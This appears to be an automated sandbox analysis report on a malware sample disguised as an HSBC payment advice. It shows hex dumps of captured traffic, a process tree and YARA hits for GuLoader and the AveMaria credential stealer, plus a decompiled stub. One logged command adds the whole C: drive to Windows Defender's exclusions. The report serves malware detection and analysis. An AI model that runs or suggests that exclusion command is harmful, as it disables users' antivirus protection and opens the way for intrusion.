                  Data Ascii: Xj3.;Tr_'[6*`vqL7=P:_\8f9n*Q(v*@rx7LOLP_Z;h;tcB:w[`|PrwPlk(2dF.r{ZmnP0[A.Tha\K\tpo@w[]+>}8I&!%=gO*>?-Wl
                  2021-11-25 17:53:00 UTC137INData Raw: 25 1f 2e 3f 82 ef 85 4d 4e 65 0f 29 17 6b 2c 82 29 72 57 88 a3 78 5d c9 c0 c1 8a e1 6e d9 dc c7 43 83 1b 01 86 2b 1a 9f f6 a6 20 94 ea 89 6a 19 ac 12 8f 3e d5 d7 c3 a0 9c f1 09 5b 77 c5 85 cb c8 83 aa 93 b0 b4 a7 88 8d 6c db bc 09 66 8e 5b ea 9a 32 08 00 98 f4 c3 ad 39 88 e9 93 28 4a d8 2c 60 e8 93 23 25 b5 4a 40 c9 c9 ca 6d a0 bd f6 4a 5e 62 ea 19 a4 c0 7c 7a 69 eb 57 ec 26 b6 f5 57 a0 3b 91 49 b9 fe 60 54 5d 79 cf 40 ac 19 56 9c f9 68 73 ef 2f d9 1e 90 9b 61 c3 86 a2 e7 1f 9a 5b 22 5a 34 79 45 8d 36 e1 29 df 6b d4 bb 9d 45 c4 b9 d4 96 cf fc 18 09 fa 8e 75 21 d3 f5 dd fe be ba b7 ab fa b8 8d eb 3d c0 03 64 c1 5a 88 51 71 28 e2 96 11 e6 69 1e b3 9b 62 b8 eb 96 1b 7e 6e 68 48 7f 68 47 05 39 81 2b 5b 06 21 1f ab 8a 90 59 b8 93 f4 99 2d 94 22 da 13 a0 72 3b
                  Data Ascii: %.?MNe)k,)rWx]nC+ j>[wlf[29(J,`#%J@mJ^b|ziW&W;I`T]y@Vhs/a["Z4yE6)kEu!=dZQq(ib~nhHhG9+[!Y-"r;
                  2021-11-25 17:53:01 UTC145INData Raw: 6e 33 0b 73 4e e5 ec 06 70 59 32 e9 fd 22 1f 90 fd 97 72 3a 92 80 8b 52 6d 3f ba d7 62 fa bf 38 ea ee 3d e9 e6 1b 98 bd b4 95 4c 4c 75 e0 03 6b dc 58 9a b6 8b 79 df 2b 46 63 8e 2e b5 be 36 36 ad aa 73 af 32 47 9e 91 b6 53 08 08 d8 bb 10 3c 45 8b e1 f3 67 f8 ba 10 40 93 39 ab f7 e0 f7 ff bd 0b b3 06 d3 cf 7c cc 69 84 b6 a5 cb c8 27 ab c3 02 80 de 44 5f 04 e2 04 3e f0 f9 f9 05 83 c9 50 5a cd e7 dd d9 8c a9 ef 08 11 9b d6 10 ec 8e 33 4a 06 4c 82 b9 a2 9a 05 ac c4 82 a0 d4 fe 2f a9 23 9d 9a 2b fd 4b a9 ac 0b bf d3 a6 b1 20 8c ab 4d 22 03 73 64 35 fe 5c 73 03 cb 1f 84 77 cb 4b 61 a9 29 75 36 fc f8 44 10 b5 c2 74 22 83 2f a8 17 89 4b 19 07 8a 21 56 27 95 2f a3 3a cd 8e 65 37 b4 56 2d 6f 0b ae 49 cc 27 7d aa 21 5b 76 7a c4 67 35 61 0b eb b4 ab 4d 56 79 d2 9b 8a
                  Data Ascii: n3sNpY2"r:Rm?b8=LLukXy+Fc.66s2GS<Eg@9|i'D_>PZ3JL/#+K M"sd5\swKa)u6Dt"/K!V'/:e7V-oI'}![vzg5aMVy
                  2021-11-25 17:53:01 UTC152INData Raw: 70 d7 9c d9 05 cc dc 90 e5 e9 3c 3f fc 42 7e 2d e3 ad 98 07 5d 41 c1 25 28 da 03 27 43 38 24 e3 25 37 66 bc df e5 36 4d 60 12 a2 b9 98 cc 72 b5 ca 27 2f 10 02 9b ac cf f8 34 65 14 8e 93 e2 33 ac e9 cb c9 fa 75 44 bb 47 8f 8c 93 03 3e c1 a9 76 d5 f4 59 41 df 4e a2 02 08 de 71 09 26 8d 3c 0f 56 02 6f 73 ca e3 d4 91 01 91 d8 ed 63 f7 80 bc 86 b1 f4 fe 70 60 89 3a 0b 69 40 2b 78 ae b9 14 17 40 d8 a8 06 93 12 a8 af 37 24 e9 37 a2 a1 26 ad b5 49 09 9b 64 df 00 71 64 8e ac 0a 70 b4 db 45 36 02 73 1f 80 7a e3 f6 26 11 29 d9 ea b2 ac f7 dc c2 98 91 64 45 59 a8 a0 3c b1 9e 5c 66 bd f4 2f 41 b1 e6 9d ea 5c 92 71 db b2 c7 fb 94 8b f2 cc 48 d3 4a fa 64 d8 54 6a 9e 1e 92 8b f2 d1 97 7f c8 b1 39 11 d8 d6 31 84 7b 9a ba ff 72 b0 7f c7 06 bf 81 90 d6 e8 2f 00 b7 fe 5c 6e
                  Data Ascii: p<?B~-]A%('C8$%7f6M`r'/4e3uDG>vYANq&<Voscp`:i@+x@7$7&IdqdpE6sz&)dEY<\f/A\qHJdTj91{r/\n
                  2021-11-25 17:53:01 UTC160INData Raw: a9 11 3b ae 10 c1 e1 ee 66 0c 6a 93 d0 1b 55 b0 fc ec 97 e4 29 ad 95 8c f3 bb 01 b4 26 79 cf ec 5e d8 f8 94 65 40 74 e1 6b b4 ad 5d cd 03 fc 7a f9 56 36 1d 0d 37 eb d7 05 36 d2 24 34 f3 4a 2d 4e 00 8a 7b 6d 9e d6 89 4b 55 00 46 e7 ea 57 51 59 c0 61 fb e6 06 b5 54 c3 a2 c5 1a da 79 8f 51 43 a9 3d fa f9 46 de 0a 6f 7d a2 f2 24 e7 6c 40 6e ae 10 19 a9 83 41 a6 ec 88 75 d8 ae ca 40 0e 17 07 66 ef 6c 7d e6 be fe b7 50 c7 b8 c4 35 24 43 9a de e7 55 29 f9 29 61 89 84 35 0b 6e e6 fb 99 5a f0 f8 08 fd 9f a5 4e 10 dc 6a 4e 5d e7 f9 16 e0 bc f9 07 33 dd 8c cf 29 c2 1c ea 0c 51 d6 be 16 25 8d ef b0 cf 02 f2 f8 38 50 01 9d c5 c8 9b f2 08 67 33 69 85 c5 7c 98 75 db 7d 5a 0a 1b 6e c0 9b c9 24 a9 38 78 d8 b2 11 08 90 89 b7 dd 2f 09 71 06 f2 1e fa 40 58 ff 16 c8 b2 9b bf
                  Data Ascii: ;fjU)&y^e@tk]zV676$4J-N{mKUFWQYaTyQC=Fo}$l@nAu@fl}P5$CU))a5nZNjN]3)Q%8Pg3i|u}Zn$8x/q@X
                  2021-11-25 17:53:01 UTC168INData Raw: d8 23 21 e6 c8 b7 07 48 af 42 10 c7 c5 fd 0e e6 6a 54 7c d6 8b e1 a9 6e 62 c8 f4 91 6d bd 4e 5c 73 a0 69 73 1c 2c 13 2b 18 3f 12 a0 26 6e 16 4c 51 51 1e 52 50 44 62 75 a7 16 ad 1b 14 ee ca 27 9d b5 8d 1c 27 c2 d3 0b 2f 2c 3b 82 d2 c6 2d ed a3 ee d7 b1 e8 dc 6c 27 90 54 60 e5 8f 33 98 d8 e9 73 af 06 a0 b5 89 1b 9f 53 af 36 0c 7d 0a 39 79 4d 9e 89 79 2b 41 23 94 4f a9 29 a0 d9 7c 1e f1 50 66 ff 60 6f 1f a2 f0 28 7b fd f7 cf f7 a0 fa 87 7c c4 1f d3 de 4b ed 16 5e a6 19 fd 9e f4 ea cb f5 9d e0 a7 4c 08 ac 6d 5a 44 51 91 99 bc d6 23 76 2d dd ae 05 4b 24 4d c9 9b 68 6f 27 41 56 54 78 f0 e8 f9 9f f5 99 aa c6 13 86 e6 62 ba 1e 96 b7 10 3b cf 89 26 b6 8a de f2 53 46 cb 72 06 2c 7b 8c 18 7d 6c c3 d1 3d 98 19 e5 59 49 5d e4 91 90 c7 2f 46 b8 97 1b c0 da 1e 72 01 b9
                  Data Ascii: #!HBjT|nbmN\sis,+?&nLQQRPDbu''/,;-l'T`3sS6}9yMy+A#O)|Pf`o({|K^LmZDQ#v-K$Mho'AVTxb;&SFr,{}l=YI]/Fr
                  2021-11-25 17:53:01 UTC176INData Raw: d6 64 26 ca a3 a0 0d 5a 8f b2 ae 27 8c c5 05 8f c3 b0 fa d8 55 05 52 22 07 f6 e3 64 47 f7 06 db a3 e6 87 b3 e1 48 30 35 85 64 28 c6 69 fb c3 27 37 6c ce 0e 03 61 27 91 5c ea 46 52 d7 16 a6 e4 5f 79 da 3d b1 b1 58 39 ce 49 79 74 b6 82 f1 6e 79 89 85 48 0f fb 85 db e4 21 88 d3 6b f9 f2 15 71 6e 14 7e 2d 73 6f d2 49 a5 f3 a7 ce 29 da 4b 0e e8 f6 0c b3 da b8 33 8d 7f c9 f8 12 43 3b cf 64 33 fc d0 fe 46 a9 c4 79 6c 74 da 6e e5 53 1b bf 14 eb ae 84 53 e0 ef b1 6e 3b 6e 67 1b 88 a7 ff b0 2c f4 c1 b0 44 be a7 dc fd f3 31 12 6e f4 42 e4 f1 d2 b3 b3 cc d6 2a 6c 06 c8 1b 6e eb ee 40 f4 7d 81 1e ab 28 7c 29 7b 28 6c 22 8b f8 32 81 f0 ea 44 14 cf 9f 67 c4 40 b6 ba bd cd d2 09 3c ee 7a cf ea dc e4 e1 66 6d e2 30 e4 76 ca 6e b6 91 6f 7b 5e f4 0d f5 88 84 5c bb c6 a2 63
                  Data Ascii: d&Z'UR"dGH05d(i'7la'\FR_y=X9IytnyH!kqn~-soI)K3C;d3FyltnSSn;ng,D1nB*ln@}(|){(l"2Dg@<zfm0vno{^\c
                  2021-11-25 17:53:01 UTC184INData Raw: ac 93 bf 10 a1 c4 c7 3e 3e de 2c e5 95 a7 82 60 9c f8 2c 83 ef 10 c7 af 04 0f 38 d3 ff 9c 81 bb 82 4e 7f ab 91 33 10 1f 24 6c c0 cc e4 49 eb e3 72 aa 25 e5 93 88 e9 83 c4 e4 b9 65 5c 8d 84 0d f3 84 1e fe c5 ab 92 1e 62 57 2a c2 73 99 3c 84 87 5c 8a 76 5b ac 74 3f 71 f1 b4 dc 3d e6 20 98 b4 ca 22 5f 18 ea 03 dd 3a 25 29 4c 6a e4 33 51 7d 47 37 83 6b 7e 45 67 dd a4 4b 3a e8 4c b5 f6 62 95 7b b2 2c 7b 3e 66 eb bc 65 4a 26 46 c9 ad 3f 6f 94 2e fd 20 90 31 4b ee e2 ed 69 3e 6a 03 1e a9 ff c0 29 ad dd 12 25 19 08 2a 32 94 7f 12 ca 88 8a 1d 17 85 22 bb c4 b1 00 7d 54 cf 5d f9 f0 1c dc 49 e6 87 65 f9 56 04 80 13 41 7f 5f 15 3d c2 5e 2b 38 9d 48 36 73 28 12 f4 5c 26 57 4b 9c 5d 9f 31 78 c8 85 5f 8b 22 a4 41 f5 41 d1 22 72 e8 cf fc a6 d7 98 9a cb 86 ab 28 f2 9d c1
                  Data Ascii: >>,`,8N3$lIr%e\bW*s<\v[t?q= "_:%)Lj3Q}G7k~EgK:Lb{,{>feJ&F?o. 1Ki>j)%*2"}T]IeVA_=^+8H6s(\&WK]1x_"AA"r(
                  2021-11-25 17:53:01 UTC191INData Raw: 26 9c df 06 0a a1 67 e4 0d 1d d7 87 c2 e5 38 80 fe f4 02 9e ef 1b 0c 17 7a 66 aa 22 23 db 32 eb 0d 2b a4 ad 62 4d 79 60 8d 79 dd 9e 54 14 0e 35 6f 31 bf 69 bf 73 07 76 22 2f 7e d2 2a 84 0d d0 e8 ff 43 f0 bf 6a 63 27 54 1b eb 37 b0 16 e1 c1 84 d1 6d 37 c2 41 e9 d6 4e a5 c7 7d b7 9a c7 44 ee 0c 61 5c a1 76 11 c5 26 be 66 0a 38 f4 61 39 6c a5 21 fd 85 1f 51 e3 e2 7f d5 e4 82 6b c6 cb 30 3b 9e 6b eb 39 da aa 41 cc 4f 92 01 71 46 38 58 a0 2d e0 d5 7d de 9e b8 0b 2c 5b 20 5f 35 0a dd a5 e7 fa cf 6e 7f 1c 57 c9 ae 70 04 09 70 eb 25 30 f2 d0 9f 1a 50 91 84 22 f0 ee 59 75 36 94 12 84 20 a9 76 d1 cf b4 12 e9 a5 7b 80 ff 10 6a d9 54 06 ff c7 f2 a2 bb 82 89 b0 46 b9 95 b3 e5 41 d7 bb d5 ac 95 df c8 da b9 69 b2 3c c3 cd 96 d8 3b 73 9e b5 03 2b 50 55 15 b6 72 ae 65 d6
                  Data Ascii: &g8zf"#2+bMy`yT5o1isv"/~*Cjc'T7m7AN}Da\v&f8a9l!Qk0;k9AOqF8X-},[ _5nWpp%0P"Yu6 v{jTFAi<;s+PUre
                  2021-11-25 17:53:01 UTC199INData Raw: f9 b4 c9 d9 86 12 23 04 4f a8 63 36 03 05 57 59 de d3 11 bf 75 03 8c 18 ff 3b b9 8d 89 36 dd 25 c7 a5 0d 72 56 e0 66 c9 ef 2e ce 07 68 06 a2 56 5f 62 81 85 6e 71 50 8e cd e5 aa b8 de e9 96 ba 71 20 c6 c3 bb a3 61 53 27 71 72 32 25 16 db 2b 78 64 b6 e0 36 74 97 43 e4 59 e3 05 98 56 ef c2 31 07 ca 09 db ab 9d 38 10 47 5e f8 b7 46 98 9d ce 8b 8b a0 b9 37 05 73 50 1e bb 50 8c 27 3c 97 8a a6 f2 9f fb 1c 5a 12 38 70 dc ed 61 a2 2b 5c 46 08 f4 59 3a aa ae 1e ff 7c 41 bc 5c d3 7f ba fb 49 8b 4f 7d 65 2a 2c 85 3b 5a 28 d9 c5 aa 43 60 ab e5 1d b4 78 3d c8 b3 f1 03 10 e0 91 e7 51 e6 7e e7 28 74 19 3c 50 14 31 cc f0 44 a0 27 e7 28 64 20 7a 45 a9 36 7f 0b 70 f5 e9 40 e2 b0 d7 11 2f 30 c5 b7 8c 44 92 99 cd 41 a5 d2 bc fc 6e 77 6e 3e ec f3 32 0f f9 39 2b 61 a5 2e f4 62
                  Data Ascii: #Oc6WYu;6%rVf.hV_bnqPq aS'qr2%+xd6tCYV18G^F7sPP'<Z8pa+\FY:|A\IO}e*,;Z(C`x=Q~(t<P1D'(d zE6p@/0DAnwn>29+a.b
                  2021-11-25 17:53:01 UTC207INData Raw: dc cb cb a9 51 75 3b 28 fa 24 25 b8 91 dd a7 e1 8d e6 9f 40 82 8c 98 4b 6b 8c 01 b5 37 ff 8e e3 ca a3 22 02 4d e3 d4 b2 b0 8a 8f 0b 75 9a d8 ab 5c ad 33 75 99 d8 a4 cd 35 aa b5 09 8c 7d 2e 2d 95 4e 0e d1 75 e2 ae f6 0f 39 61 02 0a f1 08 52 39 8a 41 70 70 01 0d 9c c1 d9 eb 66 da 04 c5 f1 99 31 ad 8e 9b 2e bf e8 35 83 8f 80 11 5d ce ee f3 bf 3c 1b 6c 25 5f e2 62 72 d2 8d e5 da 5b 85 77 1d 50 b3 04 c7 6c e5 8b ea 51 13 23 6b 26 e2 48 bd 47 2f d2 4b ec 76 eb 55 33 b9 d4 41 c9 d5 d2 6f ea 7b 3e 87 bc 2a 96 bd f0 ca e5 61 62 56 ec 66 05 d4 d1 32 fd e9 1f 0a 3a 0e 60 20 bb 46 17 3b 37 b5 e4 d9 bd 36 9a 05 72 cb 72 53 2f df 07 64 da 0b 18 59 2e 64 63 93 81 19 dd 6d f0 18 27 f8 b3 af a4 c8 be 64 a6 79 fe 9d 9e c7 5a bd 34 fb 37 06 18 83 3f 15 b9 dc 18 d9 84 71 87
                  Data Ascii: Qu;($%@Kk7"Mu\3u5}.-Nu9aR9Appf1.5]<l%_br[wPlQ#k&HG/KvU3Ao{>*abVf2:` F;76rrS/dY.dcm'dyZ47?q
                  2021-11-25 17:53:01 UTC215INData Raw: 10 b7 3a a8 1f 80 f8 23 64 21 6d 20 2a f3 30 db 66 15 d5 25 a9 0e 8e 36 13 3d d6 82 ac a1 86 24 ee 6f 0f 92 a9 66 e2 bd f0 81 a0 b7 0c 13 a0 59 37 fa b5 70 a1 d9 7c 5f 5e 79 13 c0 e9 2f 79 af 55 e2 e4 c5 cc 25 88 01 61 a2 1c 57 6c 9e 07 3b db 4c 7d 03 0b 69 6c 83 8f 4a f3 72 f2 08 12 9f b3 82 a5 e3 fd 10 e0 46 8c f8 f9 9b 5c ac 3b eb 01 4b 44 e7 50 62 b9 25 3f 9e e1 11 cb 15 23 d0 24 40 05 34 50 f6 49 0e af 36 74 7f a1 5f ca 8b d7 f6 b0 39 4e e8 a5 71 19 0e 0f 0a 53 9f 0a b9 02 9e f9 07 a4 57 36 c8 a2 c4 77 78 97 39 6d fa 3a 32 64 b1 f5 99 43 cb a7 37 6c f3 a0 61 60 4a 1a 09 12 5d 2f c7 15 26 68 8e 79 fb f3 0c d2 99 c0 de 4a 89 b7 67 82 8e c2 b7 99 20 f5 1a 00 d5 a1 ff c6 03 a6 9f 72 ff 59 1b 6c 4c 6f e5 f6 93 af bf 6b 6e 7c 01 90 1b 14 50 b3 ef e9 80 1a
                  Data Ascii: :#d!m *0f%6=$ofY7p|_^y/yU%aWl;L}ilJrF\;KDPb%?#$@4PI6t_9NqSW6wx9m:2dC7la`J]/&hyJg rYlLokn|P
                  2021-11-25 17:53:01 UTC223INData Raw: 59 56 0c 10 45 c6 90 ec 4b 4f b8 ae f5 0f d7 f6 30 17 27 c8 c5 05 78 9b 09 ac 60 93 3f 9f 10 e3 cc d5 93 f4 03 4f fe b8 20 12 c0 38 6d d1 0c 0f 52 fa f3 c6 75 b3 91 4f 5a 34 f2 f2 22 33 2d 20 25 7a 28 51 22 c9 50 3d 4e 17 a6 b7 96 db f8 96 72 e4 cf e3 ba 68 fa 2c a1 af bf c0 4a 01 bd 2b cf e8 9e 67 4a 8b 20 0e 55 62 44 d1 cf 83 e4 87 20 6e 61 41 9b 6c 2d 2e 8a b7 f6 18 23 f0 fd fa e4 d2 c2 22 79 c2 91 81 39 b2 ea a6 2a 9c 75 6d 5a 81 27 fa 54 ee ca 29 a5 3a bc af cd 01 d5 59 d1 c5 21 24 ab ec a7 7c fe bc fc 89 d4 ab 46 97 a1 28 23 06 7c 3c 23 e2 88 7a 1f 51 e5 d8 ea 4e d5 a8 80 03 5d de 82 ef 71 81 bc ab 97 86 7b 35 32 d8 db b6 bf 95 5a a2 b4 9f aa 44 b5 8d 12 9e 0e cc 0c fd fc 15 cb 07 d5 a5 b6 7b 9d 0b db 80 54 a0 e6 ab f2 2c d5 31 ac b1 7d 4a bc e1 43
                  Data Ascii: YVEKO0'x`?O 8mRuOZ4"3- %z(Q"P=Nrh,J+gJ UbD naAl-.#"y9*umZ'T):Y!$|F(#|<#zQN]q{52ZD{T,1}JC


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: HSBC Payment Advice.exe PID: 6196 Parent PID: 5108

                  General

                  Start time:18:48:50
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBC Payment Advice.exe"
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.378161921.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Chronological Activities

                  Analysis Process: HSBC Payment Advice.exe PID: 5816 Parent PID: 6196

                  General

                  Start time:18:49:51
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\HSBC Payment Advice.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBC Payment Advice.exe"
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000C.00000003.502703616.0000000001B6F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000C.00000003.501711876.0000000001B2F000.00000004.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Chronological Activities

                  Analysis Process: powershell.exe PID: 7140 Parent PID: 5816

                  General

                  Start time:18:50:50
                  Start date:25/11/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:powershell Add-MpPreference -ExclusionPath C:\
                  Imagebase:0x1110000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  Chronological Activities

                  Analysis Process: conhost.exe PID: 7068 Parent PID: 7140

                  General

                  Start time:18:50:50
                  Start date:25/11/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff774ee0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Analysis Process: images.exe PID: 6136 Parent PID: 5816

                  General

                  Start time:18:50:51
                  Start date:25/11/2021
                  Path:C:\ProgramData\images.exe
                  Wow64 process (32bit):true
                  Commandline:C:\ProgramData\images.exe
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.653463749.0000000000650000.00000040.00000001.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 56%, Virustotal, Browse
                  • Detection: 20%, Metadefender, Browse
                  • Detection: 49%, ReversingLabs
                  Reputation:low

                  Chronological Activities

                  Analysis Process: images.exe PID: 5216 Parent PID: 6136

                  General

                  Start time:18:51:59
                  Start date:25/11/2021
                  Path:C:\ProgramData\images.exe
                  Wow64 process (32bit):true
                  Commandline:C:\ProgramData\images.exe
                  Imagebase:0x400000
                  File size:111776 bytes
                  MD5 hash:A069E61B357F625A7B3595150412C42D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001C.00000002.775081701.00000000017A0000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Chronological Activities

                  Disassembly

                  Code Analysis

                  Reset < >

                    Analysis Process: HSBC Payment Advice.exe PID: 6196 Parent PID: 5108 HSBC Payment Advice.exeCOMMON

                    Executed Functions

                    Function 004011A8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 18%
                    			_entry_(signed char __eax, intOrPtr* __ebx, signed int* __ecx, signed char __edx, intOrPtr* __edi, void* __esi, signed long long __fp0) {
				signed char _t444;
				signed char _t445;
				intOrPtr* _t446;
				signed char _t447;
				signed char _t448;
				signed char _t450;
				signed char _t452;
				signed char _t453;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				intOrPtr* _t459;
				signed char _t460;
				intOrPtr* _t461;
				signed int _t462;
				signed int _t463;
				signed int* _t466;
				signed char _t467;
				signed char _t468;
				signed char _t469;
				signed int _t471;
				signed int _t472;
				signed char _t476;
				signed char _t477;
				signed int _t478;
				signed char _t479;
				intOrPtr* _t481;
				signed int _t482;
				signed int _t483;
				signed char _t484;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				intOrPtr* _t488;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				signed int _t493;
				signed int _t494;
				signed int _t495;
				signed int _t497;
				signed char _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				signed char _t504;
				signed int _t506;
				signed int _t507;
				signed int _t508;
				signed int _t509;
				signed char _t512;
				signed char _t513;
				signed int _t514;
				signed int _t515;
				intOrPtr* _t516;
				signed char _t517;
				signed char _t518;
				signed char _t519;
				signed int _t520;
				signed int _t521;
				intOrPtr* _t522;
				signed char _t523;
				signed int _t524;
				signed char _t525;
				intOrPtr* _t527;
				intOrPtr* _t528;
				signed int _t529;
				signed char _t530;
				intOrPtr* _t531;
				void* _t532;
				intOrPtr* _t533;
				intOrPtr* _t534;
				signed int _t535;
				signed int _t536;
				signed char _t537;
				intOrPtr* _t538;
				intOrPtr* _t540;
				intOrPtr* _t541;
				signed char _t542;
				intOrPtr* _t545;
				void* _t548;
				void* _t549;
				void* _t550;
				void* _t551;
				signed char _t554;
				signed char _t559;
				void* _t561;
				signed int _t562;
				void* _t564;
				signed int _t565;
				signed char _t571;
				signed char _t572;
				void* _t573;
				signed int _t574;
				intOrPtr* _t576;
				void* _t577;
				signed char _t580;
				void* _t582;
				void* _t583;
				signed int _t584;
				signed int _t586;
				signed int _t587;
				void* _t589;
				intOrPtr* _t591;
				intOrPtr* _t593;
				void* _t595;
				void* _t596;
				signed char _t599;
				void* _t600;
				intOrPtr* _t601;
				signed char _t602;
				signed char _t605;
				signed char _t606;
				intOrPtr* _t607;
				signed int _t608;
				intOrPtr* _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				intOrPtr* _t615;
				intOrPtr* _t620;
				intOrPtr* _t621;
				signed int _t623;
				intOrPtr* _t625;
				signed int _t626;
				signed char _t630;
				signed int _t631;
				signed char _t636;
				signed char _t641;
				intOrPtr* _t643;
				intOrPtr* _t645;
				signed char _t647;
				intOrPtr* _t648;
				intOrPtr* _t650;
				intOrPtr* _t660;
				signed int _t661;
				void* _t663;
				void* _t665;
				void* _t668;
				signed char _t670;
				intOrPtr* _t671;
				signed int _t672;
				signed char _t673;
				signed char _t675;
				signed char _t676;
				signed int _t677;
				signed int _t678;
				intOrPtr* _t679;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t684;
				intOrPtr* _t689;
				signed char _t690;
				intOrPtr* _t691;
				void* _t692;
				intOrPtr* _t693;
				intOrPtr* _t694;
				intOrPtr* _t695;
				void* _t700;
				signed int* _t703;
				intOrPtr* _t704;
				signed int* _t705;
				void* _t707;
				intOrPtr* _t708;
				signed char _t710;
				intOrPtr* _t712;
				intOrPtr* _t713;
				intOrPtr* _t714;
				intOrPtr* _t715;
				signed int _t717;
				signed char _t719;
				intOrPtr* _t721;
				intOrPtr* _t722;
				intOrPtr* _t723;
				void* _t724;
				intOrPtr* _t725;
				signed int _t728;
				signed int* _t730;
				signed int* _t731;
				signed int* _t732;
				signed int* _t733;
				void* _t737;
				signed char _t740;
				signed char _t741;
				signed char _t744;
				signed char _t745;
				intOrPtr* _t748;
				signed int* _t750;
				void* _t751;
				void* _t756;
				intOrPtr* _t758;
				signed char _t759;
				signed int _t760;
				signed char _t763;
				signed char _t764;
				signed int _t765;
				signed int _t767;
				void* _t772;
				void* _t780;
				void* _t818;
				signed long long _t845;

				_t845 = __fp0;
				_t756 = __esi;
				_t748 = __edi;
				_t740 = __edx;
				_t703 = __ecx;
				_t689 = __ebx;
				_t444 = __eax;
				_push("VB5!6&*");
				while(1) {
					_t445 = _t763;
					_t764 = _t444;
					asm("sbb [eax], eax"); // executed
					L004011A0(); // executed
